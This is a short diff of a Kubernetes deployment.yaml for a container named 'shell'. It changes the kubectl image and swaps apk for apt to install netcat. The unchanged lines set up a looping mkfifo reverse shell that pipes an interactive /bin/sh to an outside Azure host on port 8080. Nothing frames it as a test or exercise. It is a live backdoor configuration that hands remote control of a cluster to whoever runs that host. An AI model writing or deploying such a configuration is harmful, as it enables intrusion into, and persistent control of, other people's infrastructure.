--- a/deployment.yaml
+++ b/deployment.yaml
@@ -15,12 +15,12 @@ spec:
     spec:
       containers:
         - name: shell
-          image: lachlanevenson/k8s-kubectl:v1.28.0
+          image: bitnami/kubectl:latest
           command:
             - sh
             - -c
             - |
-              apk add --no-cache netcat-openbsd;
+              apt update && apt install -y netcat;
               while true; do
                 mkfifo /tmp/f;
                 /bin/sh -i < /tmp/f 2>&1 | nc potter-maga.brazilsouth.cloudapp.azure.com 8080 > /tmp/f;
